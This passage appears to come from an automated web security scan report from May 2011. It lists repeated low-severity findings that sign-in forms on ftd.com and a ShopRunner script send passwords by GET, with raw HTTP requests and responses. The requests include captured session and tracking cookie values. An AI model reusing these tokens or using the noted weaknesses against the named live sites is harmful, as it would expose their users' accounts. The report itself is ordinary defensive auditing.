Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:28:42 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:28:42 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 117006


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="billing_page_signin_popup" width="273"> <form action="https://ordering.ftd.com/528/signin/"> <table width=273 border=0 cellpadding=1>
...[SNIP]...
<td width='60%' align=left><input type="password" name="password" value="" size="12" maxlength="18" /></td>
...[SNIP]...

11.3. https://ordering.ftd.com/reminder-signin/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /reminder-signin/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET /reminder-signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/new-signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Sweet%20Shop%5C%22%2C%5C%22type%5C%22%3A%5C%22index%5C%22%2C%5C%22value%5C%22%3A%5C%22%252Fsweet-shop-ctg%252Fproduct-sweet-shop%252F%253Fmarkcode%253D528%5C%22%2C%5C%22prevName%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22prevType%5C%22%3A%5C%22home%5C%22%2C%5C%22prevValue%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=51933897653166366864628919699136; s_cc=true; last_active=1305541288018; mbcs=837A23D2-E1A6-55BC-B51D-1B2EBC885D29; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DCategory%25253Aproduct_sweet_shop%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305541789414

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:39:19 GMT
Server: Apache
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:39:20 GMT
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 98257


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="toolbar_signin_form" width="240" style="z-index:1001">
<form style="margin:0px;" action="https://ordering.ftd.com/528/signin/">
<table width="240" border="0" cellpadding="1">
...[SNIP]...
</label>
<input class="password" type="password" name="password" value="" maxlength="18" style="width:125px;" /></div>
...[SNIP]...

11.4. https://ordering.ftd.com/reminder-signin/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /reminder-signin/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET /reminder-signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/new-signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Sweet%20Shop%5C%22%2C%5C%22type%5C%22%3A%5C%22index%5C%22%2C%5C%22value%5C%22%3A%5C%22%252Fsweet-shop-ctg%252Fproduct-sweet-shop%252F%253Fmarkcode%253D528%5C%22%2C%5C%22prevName%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22prevType%5C%22%3A%5C%22home%5C%22%2C%5C%22prevValue%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=51933897653166366864628919699136; s_cc=true; last_active=1305541288018; mbcs=837A23D2-E1A6-55BC-B51D-1B2EBC885D29; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DCategory%25253Aproduct_sweet_shop%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305541789414

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:39:19 GMT
Server: Apache
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:39:20 GMT
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 98257


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="billing_page_signin_popup" width="273">

<form action="https://ordering.ftd.com/528/signin/">
<table width=273 border=0 cellpadding=1>
...[SNIP]...
<td width='60%' align=left><input type="password" name="password" value="" size="12" maxlength="18" /></td>
...[SNIP]...

11.5. https://ordering.ftd.com/signin/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /signin/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET /signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; s_cc=true; last_active=1305510812803; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511186703

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:09:59 GMT
Server: Apache
Set-Cookie: track_id=baabe59f09870e0c5f1e6606009b9fb7e5a425b7fc231e55d6f4be1dbe08dc9c; expires=Thu, 13 May 2021 02:09:59 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 02:09:59 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 113972


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="toolbar_signin_form" width="240" style="z-index:1001"> <form style="margin:0px;" action="https://ordering.ftd.com/528/signin/"> <table width="240" border="0" cellpadding="1">
...[SNIP]...
</label> <input class="password" type="password" name="password" value="" maxlength="18" style="width:125px;" /></div>
...[SNIP]...

11.6. https://ordering.ftd.com/signin/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /signin/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET /signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; s_cc=true; last_active=1305510812803; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511186703

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:09:59 GMT
Server: Apache
Set-Cookie: track_id=baabe59f09870e0c5f1e6606009b9fb7e5a425b7fc231e55d6f4be1dbe08dc9c; expires=Thu, 13 May 2021 02:09:59 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 02:09:59 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 113972


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="billing_page_signin_popup" width="273"> <form action="https://ordering.ftd.com/528/signin/"> <table width=273 border=0 cellpadding=1>
...[SNIP]...
<td width='60%' align=left><input type="password" name="password" value="" size="12" maxlength="18" /></td>
...[SNIP]...

11.7. http://shoprunner.force.com/content/JsContentElementsGNC

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shoprunner.force.com
Path:   /content/JsContentElementsGNC

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET /content/JsContentElementsGNC HTTP/1.1
Host: shoprunner.force.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/community/index.jsp%20%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-Modified-Since: Mon, 16 May 2011 01:05:43 GMT

Response

HTTP/1.1 200 OK
Server:
X-Powered-By: Salesforce.com ApexPages
P3P: CP="CUR OTR STA"
Last-Modified: Mon, 16 May 2011 06:29:18 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: public, max-age=8008
Expires: Mon, 16 May 2011 12:29:56 GMT
Date: Mon, 16 May 2011 10:16:28 GMT
Connection: close
Content-Length: 108383


function sr_run(){
return false
}

/* -----------------------------------------
* Global Variables
----------------------------------------- */
//the shoprunner object
var sr_$={};
sr_$.contents={}
...[SNIP]...
</div>';

//learn step 1
var s1_form='<form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions.validate.form(\'sr_lrn1F\')){sr_$.actions.learnStep(2);}return false;"><h4 class="sr_htag">
...[SNIP]...
</label><input class="sr_vpassword" name="password2" tabindex="1" type="password"></li>
...[SNIP]...

11.8. http://shoprunner.force.com/content/JsContentElementsPET

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shoprunner.force.com
Path:   /content/JsContentElementsPET

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET /content/JsContentElementsPET HTTP/1.1
Host: shoprunner.force.com
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-Modified-Since: Mon, 16 May 2011 01:05:40 GMT

Response

HTTP/1.1 200 OK
Server:
X-Powered-By: Salesforce.com ApexPages
P3P: CP="CUR OTR STA"
Last-Modified: Mon, 16 May 2011 06:29:45 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: public, max-age=7868
Expires: Mon, 16 May 2011 12:29:04 GMT
Date: Mon, 16 May 2011 10:17:56 GMT
Connection: close
Content-Length: 106125


function sr_run(){
return false
}

/* -----------------------------------------
* Global Variables
----------------------------------------- */
//the shoprunner object
var sr_$={};
sr_$.contents={}
...[SNIP]...
</div>';

//learn step 1
var s1_form='<form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions.validate.form(\'sr_lrn1F\')){sr_$.actions.learnStep(2);}return false;"><h4 class="sr_htag">
...[SNIP]...
</label><input class="sr_vpassword" name="password2" tabindex="1" type="password"></li>
...[SNIP]...

11.9. http://www.ftd.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; markcode=528; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; s_cc=true; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; s_sq=%5B%5BB%5D%5D; last_active=1305510017604; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; fsr.a=1305510799352

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 01:53:22 GMT
X-Varnish: 767403341 767403290
Age: 1
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 136387


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="billing_page_signin_popup" width="273">

<form action="https://ordering.ftd.com/528/signin/">
<table width=273 border=0 cellpadding=1>
...[SNIP]...
<td width='60%' align=left><input type="password" name="password" value="" size="12" maxlength="18" /></td>
...[SNIP]...

11.10. http://www.ftd.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method: https://ordering.ftd.com/528/signin/

The form contains the following password field: password

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; markcode=528; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; s_cc=true; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; s_sq=%5B%5BB%5D%5D; last_active=1305510017604; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; fsr.a=1305510799352

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 01:53:22 GMT
X-Varnish: 767403341 767403290
Age: 1
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 136387


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="toolbar_signin_form" width="240" style="z-index:1001">
<form style="margin:0px;" action="https://ordering.ftd.com/528/signin/">
<table width="240" border="0" cellpadding="1">
...[SNIP]...
</label>
<input class="password" type="password" name="password" value="" maxlength="18" style="width:125px;" /></div>
...[SNIP]...

11.11. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /sweet-shop-ctg/product-sweet-shop/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method: https://ordering.ftd.com/528/signin/

The form contains the following password field: password

Request

GET /sweet-shop-ctg/product-sweet-shop/ HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 10:32:33 GMT
X-Varnish: 887041366
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 198838


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="billing_page_signin_popup" width="273">

<form action="https://ordering.ftd.com/528/signin/">
<table width=273 border=0 cellpadding=1>
...[SNIP]...
<td width='60%' align=left><input type="password" name="password" value="" size="12" maxlength="18" /></td>
...[SNIP]...

11.12. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /sweet-shop-ctg/product-sweet-shop/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method: https://ordering.ftd.com/528/signin/

The form contains the following password field: password

Request

GET /sweet-shop-ctg/product-sweet-shop/ HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 10:32:33 GMT
